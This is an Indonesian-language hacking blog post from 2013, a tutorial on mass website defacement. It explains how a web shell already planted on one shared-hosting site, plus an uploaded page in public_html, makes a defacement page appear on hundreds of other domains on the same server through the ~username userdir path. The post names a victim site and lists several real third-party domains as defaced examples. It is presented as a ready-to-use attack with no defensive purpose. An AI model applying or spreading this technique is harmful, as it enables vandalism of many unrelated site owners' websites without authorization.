Jumat, 19 Juli 2013

Tutorial Deface Dengan Fake Root | User Enumeration

Posted by Erza Jullian 18.10, under | No comments

Sebenarnya saya sendiri bingung mau diaksih judul apa. Saya dapet dari threadnya bang Rebels di Forum Devilzc0de. Aslinya User Enumeration tapi tidak serumit itu. :v . Yasudah, langsung saja prakteknya.

Berikut bahan-bahan yang diperlukan :

Reverse IP

Shell yang sudah tertanam di web korban.



Exploit :

http://www.example.com/~root



 Cek web yang sudah tertanam shell dengan exploit diatas.

Contoh :

http://mysled.net/~root maka hasilnya forbidden.





Langkah selanjutnya, upload script deface di public_html .

ex : http://mysled.net/crot.html



 Oke, sekarang saatnya melihat domain ayng berada satu server dengan http://mysled.net/.

Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.

Wow, ada 874 domain.





Nah, cara melihat hasil fake root nya exploit begini :

http://www.example.com /~dirdibelakang public_html / scriptmu.html



 Lihat dir dibelakang public-html

contoh , /home/mysledne/public_html/ .

Karena saya tadi mengupload script crot.html di public_html,

coba cek salahsatu domain yang satu server dengan exploit diatas.

Contoh domain yang satu server dengan http://mysled.net/ adalah http://80s-clothing.com

Cek, http://80s-clothing.com/~mysledne/crot.html



Defaced . :)

Hal itu akan terjadi di 800 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~mysledne/crot.html

See More :



allaboutalberta.com/~mysledne/crot.html

http://aerosealcalgary.com/~mysledne/crot.html

http://aeroanalys.ca/~mysledne/crot.html

http://advicecounselling.com/~mysledne/crot.html

http://adultlifedirectory.com/~mysledne/crot.html

http://70s-fashion.net/~mysledne/crot.html

http://50s-fashion.com/~mysledne/crot.html

http://livre-audio.ca/~mysledne/crot.html

http://60s-fashion.net/~mysledne/crot.html

http://accountantscalgary.biz/~mysledne/crot.html

http://allaboutcalgary.com/~mysledne/crot.html



Dan amsih banyak lagi. Ada 800 domain lebih. :)



Sekian dan semoga bermanfaat.



./Nabilaholic404



Yang mau copas, sertakan sumber.

www.madura-cyber.org



Refrensi :

devilzc0de

0 komentar:

Posting Komentar

Tags

Blog Archive